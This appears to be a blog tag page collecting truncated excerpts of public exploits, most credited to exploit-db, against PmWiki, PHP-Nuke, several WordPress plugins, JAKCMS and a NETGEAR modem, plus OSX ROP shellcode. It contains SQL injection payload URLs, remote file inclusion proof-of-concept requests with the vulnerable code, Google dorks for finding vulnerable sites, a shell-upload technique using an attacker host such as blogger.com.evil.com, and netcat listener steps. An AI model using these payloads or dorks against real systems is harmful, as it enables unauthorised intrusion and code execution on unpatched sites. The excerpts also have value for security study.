Browsed by
Tag: exploit

PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit

<?php
/*
    ---------------------------------------------------------------
    PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit
    ---------------------------------------------------------------

    author...............: Egidio Romano aka EgiX
    mail.................: n0b0d13s[at]gmail[dot]com
    software link........: http://www.pmwiki.org/
    affected versions....: from 2.0.0 to 2.2.34

    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+

    [-] vulnerable code in PageListSort() function defined into /scripts/pagelist.php

    452.      $code = '';
    453.      foreach($opt['=order'] as…

PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection

#!/usr/bin/perl
# [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection
# Date: 2010.07.04 after 50 days the bug was discovered.
# Author/s: Dante90, WaRWolFz Crew
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770,
#               Shades Master, V1R5, yeat
# Special Greetings To: The:Paradox
# Greetings To: Shotokan-The Hacker, _mRkZ_, h473
# Web Site: www.warwolfz.org
# My Wagend (Dante90): dante90wwz.altervista.org
# ----
# Why have I decided to publish this?
# Because some nice guys (Dr.0rYX and…

WordPress jetpack plugin SQL Injection Vulnerability

######################################################
# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# software: WordPress
# Download: http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP
######################################################

*DESCRIPTION
Discovered a vulnerability in jetpack, WordPress Plugin, vulnerability is SQL injection.

File: wp-content/plugins/jetpack/modules/sharedaddy.php
Exploit: id=-1; or 1=if

*Exploitation*
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][CURRENT_USER()
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][MID((VERSION()),1,6)

Source: http://www.exploit-db.com/exploits/18126/

OSX universal ROP shellcode, tested on SNOW LEOPARD

; universal OSX dyld ROP shellcode
; tested on OS X 10.6.8
;
; if you don't want to compile, copy stage0 code from precompiled.txt
; and append your normal shellcode to it.
;
; usage:
; - put your 'normal' shellcode in x64_shellcode.asm
; - make
; - ./sc
;
; if you want to test:
; - uncomment lea rsp, [rel rop_stage0] / ret
; - make
; - nc -l 4444
; - ./sc
; - you…

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

Sense of Security – Security Advisory – SOS-11-011

Release Date. 20-Sep-2011
Last Update. –
Vendor Notification Date. 22-Mar-2011
Product. NETGEAR Wireless Cable Modem Gateway CG814WG
Affected versions. Hardware 1.03, Software V3.9.26 R14 verified, possibly others
Severity Rating. High
Impact. Authentication bypass, Cross Site Request Forgery
Attack Vector. Remote without authentication
Solution Status. Upgrade to R15 (by contacting NETGEAR)
CVE reference. Not yet assigned

Details.
The NETGEAR Wireless Cable Modem Gateway CG814WG is supplied by ISPs as customer premises equipment within…

JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit

# Exploit Title: JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit
# Google Dork: "Powered By JAKCMS"
# Date: 21/09/2011
# Author: EgiX
# Software Link: http://www.jakcms.com/
# Version: 2.2.5
# Tested on: Windows 7 and Debian 6.0.2

Source: http://www.exploit-db.com/exploits/17882/

Multiple WordPress Plugin timthumb.php Vulnerabilities

# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)

--- Description ---
The following WordPress plugins reuse a vulnerable version of the timthumb.php library. By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled domain such as blogger.com.evil.com and then providing it to the script through the src GET parameter, it is possible to upload a shell and execute arbitrary code on the…

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

# Exploit Title: Relocate Upload WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)

--- PoC ---
http://SERVER/dbunixwp_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

--- Vulnerable Code ---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder'])) {
    // WP setup and function access
    define('dbunixwp_USE_THEMES', false);
    require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter

Source: http://www.exploit-db.com/exploits/17869/

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/
# Version: 1.36 (tested)

--- PoC ---
http://SERVER/dbunixwp_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI
(requires POSTing a file with ID wpmm-upload for this to work)

--- Vulnerable Code ---
if (isset($_FILES['wpmm-upload'])) {
    // Create WordPress environment
    require_once(urldecode($_REQUEST['abspath']) . 'wp-load.php');
    // Handle attachment
    WPMiniMail::wpmm_upload();
}

Source: http://www.exploit-db.com/exploits/17868/